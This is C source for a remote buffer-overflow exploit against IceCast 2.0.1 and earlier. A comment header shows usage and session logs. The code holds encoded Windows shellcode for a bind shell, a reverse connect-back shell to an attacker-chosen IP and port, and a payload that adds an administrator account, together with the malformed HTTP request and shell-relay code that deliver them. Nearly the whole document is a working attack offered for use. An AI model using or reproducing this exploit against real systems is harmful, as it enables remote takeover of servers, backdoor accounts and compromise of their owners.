/** ** IceCast <= 2.0.1 Exploit v1.1 ** Fix Exploit by cyrex ** ------------------------------ ** Greetz flyes to: ** - dvdman for his help into debugging ** - silent ** - Lominus ** - pr0ix ** - nolife ** - IceCast Team ** ** Now Working Version: ** ** C:\>icecast ** ***************************************** ** ** - IceCast <= 2.0.1 Remote Exploit - ** ** - by cyrex - ** ** --> usage: (null) ** ** ->> -h ** ** ->> -p ** ** ->> -b ** ** ->> -r \n"); ** ** ->> -f \n"); ** ** ->> -t ** ** ->> 1 = Add's a user Name=icecast Pass:fucked ** ** ->> 2 = Binds a Shell on a Port ** ** ->> 3 = Connect Back Shell ** ** ** C:\> ** ** C:\>icecast -h 127.0.0.1 -p 1024 -b 2004 -t 2 ** [*] Resolved Host (127.0.0.1) ** [*] Connecting to Target="127.0.0.1" on port "1024" ** [*] Connected. Generate Exploit ** [*] Done. Sending now the Evil Buffer ** [*] Connecting now to BindShell... ** [*] We are in ** Microsoft Windows XP [Version 5.1.2600] ** (C) Copyright 1985-2001 Microsoft Corp. ** ** C:\Programm Files\IceCast2> ** ** C:\>icecast -h 192.168.1.5 -p 1024 -t 1 ** [*] Resolved Host (192.168.1.5) ** [*] Connecting to Target="192.168.1.5" on port "1024" ** [*] Connected. Generate User ** [*] Done. Sending now the Evil Buffer ** [*] User should now be added. Try to use psexec ** ** C:\>net user ** ** Benutzerkonten fur \\CYREX ** ** -------------------------------------------------------------------- ** Administrator cyrex1 Gast ** Hilfeassistent icecast <-- CREATED SUPPORT_388945a0 ** Der Befehl wurde erfolgreich ausgefuhrt. ** ** ** C:\> ** ** C:\>psexec \\127.0.0.1 -u icecast -p fucked cmd.exe ** ** PsExec v1.55 - Execute processes remotely ** Copyright (C) 2001-2004 Mark Russinovich ** Sysinternals - www.sysinternals.com ** ** ** Microsoft Windows XP [Version 5.1.2600] ** (C) Copyright 1985-2001 Microsoft Corp. ** ** C:\WINDOWS\system32>exit ** cmd.exe exited on 127.0.0.1 with error code 0. ** ** C:\> ** ** ** C:\>icecast -h 192.168.1.5 -p 1024 -t 3 -r 192.168.1.5 -f 2004 ** [*] Resolved Host (192.168.1.5) ** [*] Connecting to Target="192.168.1.5" on port "1024" ** [*] Connected. Generate Exploit ** [*] Done. Sending now the Evil Buffer ** [*] Now the box should connect to you :p have fun ** ** C:\> ** ** other terminal: ** ** C:\>nc -l -v -p 2004 ** listening on [any] 2004 ... ** connect to [192.168.1.5] from cyrex [192.168.1.5] 1354 ** Microsoft Windows XP [Version 5.1.2600] ** (C) Copyright 1985-2001 Microsoft Corp. ** ** C:\WINDOWS\System32> ** **/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include unsigned char shellcode[] = "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59" "\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68" "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56" "\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7" "\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9" "\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b" "\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59" "\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27" "\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50" "\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0" "\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff" "\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d" "\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24" "\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24" "\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51" "\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04" "\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89" "\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff" "\x55\x04\x31\xdb\x53\xff\xd0"; unsigned char user_shellcode[]= "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59" "\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68" "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e" "\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0" "\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65" "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x69\x63\x65" "\x63\x61\x73\x74\x20\x66\x75\x63\x6b\x65\x64\x20\x2f\x41\x44\x44" "\x20\x26\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f" "\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72" "\x73\x20\x69\x63\x65\x63\x61\x73\x74\x20\x2f\x41\x44\x44\x00"; unsigned char Payload_ReverseShell[] = "\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45" "\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3" "\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74" "\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a" "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01" "\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59" "\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68" "\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56" "\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7" "\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b" "\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf" "\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04" "\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0" "\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00" "\x00\x01\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20" "\x59\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24" "\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44" "\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89" "\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51" "\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0" "\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a" "\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff\x55\x04" "\x31\xdb\x53\xff\xd0"; unsigned char req1[] = "GET / HTTP/ 1.0\r\n" "a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n" "a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n" "a\r\na\r\na\r\na\r\na\r\na\r\na\r\na\r\n" "a\r\na\r\na\r\na\r\na\r\na\r\na\r\n\xcc"; unsigned char req2[] = "\x99\x99\r\n\r\n"; unsigned char Decoder[] = "\x60\xeb\x03\x5b\x53\xc3\xe8\xf8\xff\xff\xff\x31\xc0\x04\x34\x01" "\xd8\x50\x5b\x31\xd2\x02\x10\x40\x02\x30\x40\x50\x31\xc0\x04\x41" "\x28\xc2\x28\xc6\xc0\xe2\x04\x66\xc1\xea\x04\x31\xc0\x30\xf6\x02" "\x03\x28\x03\x66\x01\x13\x43\x58\x31\xc9\x02\x08\xe0\xd5\x61"; #define BINDSHELL_OFFSET 236 #define REVERSESHELL_IP_OFFSET 222 #define REVERSESHELL_PORT_OFFSET 229 #define TIMEOUT 3 int usage(char *p) { printf("*****************************************\n"); printf("** - IceCast <= 2.0.1 Remote Exploit -\n"); printf("** - by cyrex@EFNet -\n"); printf("** --> usage: %s \n",p); printf("** ->> -h \n"); printf("** ->> -p \n"); printf("** ->> -b \n"); printf("** ->> -r \n"); printf("** ->> -f \n"); printf("** ->> -t \n"); printf("** ->> 1 = Add's a user Name=icecast Pass:fucked\n"); printf("** ->> 2 = Binds a Shell on a Port\n"); printf("** ->> 3 = Connect Back Shell\n"); } unsigned char xor_data(unsigned char byte) { return(byte ^ 0x92); } int sh (int in, int out, int s) { char sbuf[128], rbuf[128]; int i, ti, fd_cnt, ret=0, slen=0, rlen=0; fd_set rd, wr; fd_cnt = in > out ? in : out; fd_cnt = s > fd_cnt ? s : fd_cnt; fd_cnt ++; for (;;) { FD_ZERO (&rd); if (rlen < sizeof (rbuf)) FD_SET (s, &rd); if (slen < sizeof (sbuf)) FD_SET (in, &rd); FD_ZERO (&wr); if (slen) FD_SET (s, &wr); if (rlen) FD_SET (out, &wr); if ((ti = select (fd_cnt, &rd, &wr, 0, 0)) == (-1)) break; if (FD_ISSET (in, &rd)) { if((i = read (in, (sbuf+slen), (sizeof (sbuf) - slen))) == (-1)) { ret = -2; break; } else if (i == 0) { ret = -3; break; } slen += i; if (!(--ti)) continue; } if (FD_ISSET (s, &wr)) { if ((i = write (s, sbuf, slen)) == (-1)) break; if (i == slen) slen = 0; else { slen -= i; memmove (sbuf, sbuf + i, slen); } if (!(--ti)) continue; } if (FD_ISSET (s, &rd)) { if ((i = read (s, (rbuf + rlen), (sizeof (rbuf) - rlen))) <= 0) break; rlen += i; if (!(--ti)) continue; } if (FD_ISSET (out, &wr)) { if ((i = write (out, rbuf, rlen)) == (-1)) break; if (i == rlen) rlen = 0; else { rlen -= i; memmove (rbuf, rbuf+i, rlen); } } } return ret; } int main(int argc, char *argv[]) { struct hostent *he; struct sockaddr_in client; int c, port, fd, d, x=0, a=0, ret; int BindPort; int remote_port; char *hostname; char *remote_host; unsigned char* encodeshell; u_char evilbuff[2000]; if (argc < 6) { usage (argv[0]); return -1; } while((c = getopt(argc, argv, "h:p:b:t:r:f:")) != EOF) { switch(c) { case 'h': hostname=strdup(optarg); break; case 'p': port=atoi(optarg); break; case 'b': BindPort=atoi(optarg); break; case 't': if(!strcmp(optarg,"1")) { x=1; } if(!strcmp(optarg,"2")) { x=0; } if(!strcmp(optarg,"3")) { a=1; } break; case 'r': remote_host=strdup(optarg); break; case 'f': remote_port=atoi(optarg); break; default: usage (argv[0]); return 0; } } if((he=gethostbyname(hostname))==NULL) { printf("[-] Error: (Resolving Host)\n"); exit(-1); } printf("[*] Resolved Host (%s)\n",hostname); printf("[*] Connecting to Target=\"%s\" on port \"%d\"\n",hostname,port); if((fd=socket(AF_INET,SOCK_STREAM,0))==-1){ printf("[-] Error: Socket Creation\n"); exit(-1); } client.sin_family = AF_INET; client.sin_port = htons(port); client.sin_addr = *((struct in_addr *)he->h_addr); if(connect(fd, (struct sockaddr *)&client,sizeof(struct sockaddr))==-1) { printf("[-] Error: Can't Connect to %s\n",hostname); exit(-1); } if(!x) { printf("[*] Connected. Generate Exploit\n"); if(a) { encodeshell = (unsigned char*)malloc( ( sizeof( Payload_ReverseShell ) - 1 ) * 2 + 1 ); *(unsigned long*)&Payload_ReverseShell[ REVERSESHELL_IP_OFFSET ] = inet_addr( remote_host ); *(unsigned short*)&Payload_ReverseShell[ REVERSESHELL_PORT_OFFSET ] = htons( remote_port ); Encode( Payload_ReverseShell, sizeof( Payload_ReverseShell ) - 1, encodeshell ); } else { encodeshell = (unsigned char*)malloc( ( sizeof(shellcode) - 1 ) * 2 + 1 ); *(unsigned short*)&shellcode[BINDSHELL_OFFSET] = htons(BindPort); Encode( shellcode, sizeof(shellcode) - 1, encodeshell ); } strcpy(evilbuff,(char*)req1); strcat(evilbuff,(char*)Decoder); strcat(evilbuff,(char*)encodeshell); strcat(evilbuff,(char*)req2); printf("[*] Done. Sending now the Evil Buffer\n"); d=send(fd,evilbuff,strlen(evilbuff),0); if(!d) { printf("[-] Error: Sending Evil Buffer\n"); exit(-1); } if(!a) { printf("[*] Connecting now to BindShell...\n"); sleep(5); if ((ret = new_tcpConnect (hostname, BindPort, 2000)) < 0) { printf("[-] Couldnt connect to bindshell, possible reasons:\n"); printf(" 1: Host is firewalled\n"); printf(" 2: Exploit failed\n"); goto out; } printf ("[*] We are in\n"); sh (0, 1, ret); out: close (ret); return 0; } else { printf("[*] Now the box should connect to you :p have fun\n"); sleep(3); return 0; } } if(x) { printf("[*] Connected. Generate User\n"); encodeshell = (unsigned char*)malloc( ( sizeof(user_shellcode) - 1 ) * 2 + 1 ); Encode( user_shellcode, sizeof(user_shellcode) - 1, encodeshell ); strcpy(evilbuff,(char*)req1); strcat(evilbuff,(char*)Decoder); strcat(evilbuff,(char*)encodeshell); strcat(evilbuff,(char*)req2); printf("[*] Done. Sending now the Evil Buffer\n"); sleep(5); d=send(fd,evilbuff,strlen(evilbuff),0); if(!d) { printf("[-] Error: Sending Evil Buffer\n"); exit(-1); } printf("[*] User should now be added. Try to use psexec\n"); exit(-1); } } // ripped from delokin int Encode( const unsigned char* pszIn, unsigned int nLen, unsigned char* pszOut ) { unsigned int n; for(n = 0; n < nLen; n++ ) { char cHiPart = ( pszIn[ n ] >> 4 ) & 0xf; char cLoPart = pszIn[ n ] & 0xf; pszOut[ ( n * 2 ) ] = cLoPart + 'A'; pszOut[ ( n * 2 ) + 1 ] = cHiPart + 'A'; } } int timeout(int fd) { struct timeval tout; fd_set fd_read; int err; tout.tv_sec = TIMEOUT; tout.tv_usec = 0; FD_ZERO(&fd_read); FD_SET(fd, &fd_read); err = select(fd + 1, &fd_read, NULL, NULL, &tout); if(!err) return(-1); return(0); } int new_tcpConnect (char *host, unsigned int port, unsigned int timeout) { int sock, flag, pe = 0; size_t pe_len; struct timeval tv; struct sockaddr_in addr; struct hostent* hp = NULL; fd_set rset; // reslov hosts hp = gethostbyname (host); if (NULL == hp) { perror ("tcpConnect:gethostbyname\n"); return -1; } sock = socket (AF_INET, SOCK_STREAM, 0); if (-1 == sock) { perror ("tcpConnect:socket\n"); return -1; } addr.sin_addr = *(struct in_addr *) hp->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons (port); /* set socket no block */ flag = fcntl (sock, F_GETFL); if (-1 == flag) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } flag |= O_NONBLOCK; if (fcntl (sock, F_SETFL, flag) < 0) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } if (connect (sock, (const struct sockaddr *) &addr, sizeof(addr)) < 0 && errno != EINPROGRESS) { perror ("tcpConnect:connect\n"); close (sock); return -1; } /* set connect timeout * use millisecond */ tv.tv_sec = timeout/1000; tv.tv_usec = timeout%1000; FD_ZERO (&rset); FD_SET (sock, &rset); if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) { // perror ("tcpConnect:select"); close (sock); return -1; } pe_len = sizeof (pe); if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) { perror ("tcpConnect:getsockopt\n"); close (sock); return -1; } if (pe != 0) { errno = pe; close (sock); return -1; } if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) { perror ("tcpConnect:fcntl\n"); close (sock); return -1; } pe = 1; pe_len = sizeof (pe); if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){ perror ("tcpConnect:setsockopt\n"); close (sock); return -1; } return sock; }